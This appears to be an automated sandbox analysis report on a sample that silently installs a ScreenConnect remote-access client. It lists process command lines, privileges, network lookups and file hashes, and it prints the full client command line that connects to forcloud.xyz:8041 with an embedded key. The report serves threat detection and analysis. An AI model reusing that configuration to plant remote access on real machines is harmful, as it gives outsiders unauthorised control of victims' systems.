| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe
"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5C29DD8C86517DFCD91C05D0DF17F412 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSICCD1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259509893 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000528" "0000000000000538"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A7853CBA27FEFCF5DC54A76EC1857646
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DBF948C7C9C0247417A48442C2D91ADE M Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=eef8a2dd-7cdd-4d96-ac88-046f110ebda2&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c="
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "1822f744-8df6-4c3d-b674-6fab8b91cc3f" "User"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
Files
memory/2256-0-0x00000000744EE000-0x00000000744EF000-memory.dmp
memory/2256-1-0x0000000000850000-0x0000000000858000-memory.dmp
memory/2256-3-0x0000000005310000-0x0000000005604000-memory.dmp
memory/2256-2-0x00000000744E0000-0x0000000074BCE000-memory.dmp
memory/2256-4-0x0000000000D50000-0x0000000000DDC000-memory.dmp
memory/2256-5-0x00000000744E0000-0x0000000074BCE000-memory.dmp
memory/2256-6-0x00000000744E0000-0x0000000074BCE000-memory.dmp
memory/2256-7-0x0000000000B50000-0x0000000000B72000-memory.dmp
memory/2256-8-0x0000000004E00000-0x0000000004FAA000-memory.dmp
memory/2256-10-0x00000000744E0000-0x0000000074BCE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi
| MD5 | 6ebb0b130daf468e91c095bf931388cb |
| SHA1 | c503cd29966246a33d6b8196c4788e4d83dffa09 |
| SHA256 | 824fd5fc45bc205cc73a9545c396bfaebaa5460d93eeac2aff049bc11c2036f0 |
| SHA512 | e8d2153f8709f22f28fdb8b6867c2f3c7f6abc4180a44cd35eeb277ef09f181ab0a08c53de309aa641498d6208a20bd0d842c0bedead22d4df9ae4f95ff6bdc0 |
C:\Users\Admin\AppData\Local\Temp\MSICCD1.tmp
| MD5 | 845b0569d54305e62c6e8ffe198d217c |
| SHA1 | cd06c3d1554fe08099ada4f4448a23a6422e6234 |
| SHA256 | 4da6c507c746cd07ca4546e723d0d145bbf4d26ff8de13f1a0750ef323a89a2e |
| SHA512 | af45bb8199f2af323b9954da0d11eed51459708608d356bc40bd9d9189c02c2c902f533077724dd7c6a7068e564b5c8f621ef1032098cef26ed26d5bf26e23fe |
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\Microsoft.Deployment.WindowsInstaller.dll
| MD5 | 5ef88919012e4a3d8a1e2955dc8c8d81 |
| SHA1 | c0cfb830b8f1d990e3836e0bcc786e7972c9ed62 |
| SHA256 | 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d |
| SHA512 | 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684 |
memory/2964-39-0x0000000000970000-0x000000000099E000-memory.dmp
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.InstallerActions.dll
| MD5 | 9260afe4bbde2549fc0b92f657c2e50a |
| SHA1 | 5580778a62b06d7b56d3f788727514551de31647 |
| SHA256 | 588d3a5e1b91d3756f74ea61c9c1b5f7871af924fab469cebb579f8aeb2fc135 |
| SHA512 | afce644ee04813e1e323b719e8ad3cfefe6e20ad0aa821f1325b8e0ae0144a7cff4e0f1f4b6f45df33f060392f94bcfd88d62b2218fd0bc573d65a20d80e968b |
memory/2964-43-0x00000000009C0000-0x00000000009CC000-memory.dmp
memory/2964-47-0x0000000004720000-0x00000000047AC000-memory.dmp
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.Core.dll
| MD5 | 3b1ba4bebefdc8a95b0f2f0b4e50c527 |
| SHA1 | 15551d2e8bfb829f3a96d161b43de820c0d417ce |
| SHA256 | a843b3a4549c43ef5bd8470cacf5d2f0f3b3c8110441fcc10079facc7db3de29 |
| SHA512 | f41595586cd5330537f5f02b392310b028e36f618e2583d125430ecd103ebbf6d2cf6befcfb1b32279eeb9fd7ef018f49131e3906fb61bc324da85d93a9a18c7 |
\Users\Admin\AppData\Local\Temp\MSICCD1.tmp-\ScreenConnect.Windows.dll
| MD5 | d196174cf03f86c8776e717f07d5d19f |
| SHA1 | bbd2c6a59229b3e4ec7c5742248f3f55a61dd216 |
| SHA256 | a1edd67a131505cc84d76601474c53874a56b5437b835838e4a866e20f6cd264 |
| SHA512 | cf4d159bcb42a1a7ea03f8877736cace109ae79998906b9178c74f7a9b63030cddc2bc94ef6c5f718e99c2d0039cf3589f8c4f2bf5b67db94b3b96d2c988b45b |
memory/2964-51-0x0000000004B60000-0x0000000004D0A000-memory.dmp
C:\Windows\Installer\MSI2EDE.tmp
| MD5 | ba84dd4e0c1408828ccc1de09f585eda |
| SHA1 | e8e10065d479f8f591b9885ea8487bc673301298 |
| SHA256 | 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852 |
| SHA512 | 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
| MD5 | 826314610d9e854477b08666330940b5 |
| SHA1 | 65b601d60042cf6f263cd38ac2f63cd06a9de159 |
| SHA256 | e54963cb63c9e471e2d3d59e55e4c7aeedccafdd616b99c4b3af230608e4bcc9 |
| SHA512 | 5c01d6de25d60eb6b1eb72b7fa6401b71153c2a740c41aeeb2bd302cc4e80f5c1a388b647ee16da196705ac8edbc60abda49b9a531517bb85959cc018fb5d1fb |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll
| MD5 | 3ff07c657068430ef677181d1f67066d |
| SHA1 | 37f7e9d2ccb65b4ea2733393015635ea1b43393e |
| SHA256 | d17cf13612039f6a4ca17b56c32399ccbe279a499c8d2f8e910b1fd6f4fff2b1 |
| SHA512 | 5552208b5649ceac2b32510ea12d409a85643d27e6a9c335e049195a507ae9211aee77574376fde059747998b60ae041e191635a67c3461585aba7f9b877b095 |
memory/2108-111-0x0000000000470000-0x0000000000488000-memory.dmp
memory/2108-114-0x0000000000470000-0x0000000000488000-memory.dmp
memory/2108-118-0x0000000000DD0000-0x0000000000E5C000-memory.dmp
memory/2108-122-0x0000000003960000-0x0000000003B0A000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config
| MD5 | 095c85acc658f0733bc6941163ec234c |
| SHA1 | 298c53608e02cac620702cb6abe75c70560c03b1 |
| SHA256 | 8e3dc9d06b282a536e1af7806d7f434d5738d4932dae557ccd762bfeed0bfc11 |
| SHA512 | fe3fbe2bcd2baabcf192663dd7603cce1db1025a9d40ad98598d5441d892efc0c94aa41fe61256762538e0ed3bcc3e7958cdbf87c2d577ee3bdd561597635d03 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config
| MD5 | f7f74a2053a7c858ed989f07f81b9720 |
| SHA1 | dc585c95c643e7a6b3cbb63a080e660ffebbc7b9 |
| SHA256 | fe4d54400c7fae8710be0b9040d18e78bdde3a53953629275ce40ebdcd05d7b2 |
| SHA512 | fefcef4f03b7c52346bc789f95968f26adb889a6a891eb6d782afe9c38d2571d8c703d0ad4382304a208cb44132fcfc4cdec4b5259cae6d0ba560b0ac4480043 |
C:\Config.Msi\f7829a2.rbs
| MD5 | cc0bcbfc6d61e31bf3c6e080162ad5dc |
| SHA1 | be94ede063f4410ed5c5b934efd2d633f5c294e7 |
| SHA256 | 534de8301ba505a045576f09d2943c624d6e6ba87edcd38b5e24bf6992063ba5 |
| SHA512 | dd4341dfe8d907f70db45dc6819d6afda2fe032477361523de40454ec9715817e7c248c851cb10a91caba0bed7601000e24e2d7f06a607e736d640eed036fdc0 |
memory/2108-142-0x0000000000EA0000-0x0000000000ED6000-memory.dmp
\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll
| MD5 | f311a8217807f6c85817058522e234a2 |
| SHA1 | ceb586b3cf7b0ee86ea8242d9b3d8641c9444cd1 |
| SHA256 | 032450cd037d9e0eec49e0b4ff44073d539775633fb4af6fd76d4cb19116aac9 |
| SHA512 | 5ef1f6b595af9cc7f788680ac3f3e9b8b12baafe734a8e2f675baa57f5ef2c69806492911bda54f11c5a4b8cf3cced82cfc6e0ecf214e45083e9f9aa6a83d039 |
memory/2108-144-0x00000000032F0000-0x0000000003331000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll
| MD5 | 5adcb5ae1a1690be69fd22bdf3c2db60 |
| SHA1 | 09a802b06a4387b0f13bf2cda84f53ca5bdc3785 |
| SHA256 | a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5 |
| SHA512 | 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73 |
memory/2108-146-0x0000000003430000-0x0000000003502000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll
| MD5 | be74ab7a848a2450a06de33d3026f59e |
| SHA1 | 21568dcb44df019f9faf049d6676a829323c601e |
| SHA256 | 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d |
| SHA512 | 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources
| MD5 | 511202ed0ba32d7f09eab394c917d067 |
| SHA1 | dbd611720fd1730198f72dec09e8e23e6d6488f8 |
| SHA256 | f8398a235b29af6569f2b116e0299b95512d042f5a4cd38c98c79729a5fbdb9d |
| SHA512 | f04b08938f3ebf8cfa1a1157a94da3ae4699494bdce566619afa5b13a8f6ebe556d522c064e5ea02e343b59a489343f77e3ea2bb2ea390aae35a626f41cadc77 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources
| MD5 | 5cd580b22da0c33ec6730b10a6c74932 |
| SHA1 | 0b6bded7936178d80841b289769c6ff0c8eead2d |
| SHA256 | de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c |
| SHA512 | c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787 |
\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
| MD5 | ab5fa8d90645878d587f386d0e276c02 |
| SHA1 | a602a20735a1104851f293965f1fe4ab678bf627 |
| SHA256 | 316bbf433f1f803d113adf060c528ccc636656cee26b90f5fea011c1c73c7d16 |
| SHA512 | a181e23c8fa01bc1d9f0f9f95a5ca6112e2b61f34f4c1da696d3ccabbbd942bcc81a3f4a60921328a6020d28aed8711c22be33761cb685921d50fea8b1d7b986 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config
| MD5 | 728175e20ffbceb46760bb5e1112f38b |
| SHA1 | 2421add1f3c9c5ed9c80b339881d08ab10b340e3 |
| SHA256 | 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077 |
| SHA512 | fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7 |
memory/2072-154-0x0000000001360000-0x00000000013F6000-memory.dmp
memory/2072-155-0x00000000005D0000-0x0000000000606000-memory.dmp
memory/2072-156-0x0000000000C40000-0x0000000000CCC000-memory.dmp
memory/2072-157-0x000000001B350000-0x000000001B4FA000-memory.dmp
memory/2072-158-0x0000000000610000-0x0000000000628000-memory.dmp
memory/2072-159-0x0000000000630000-0x0000000000648000-memory.dmp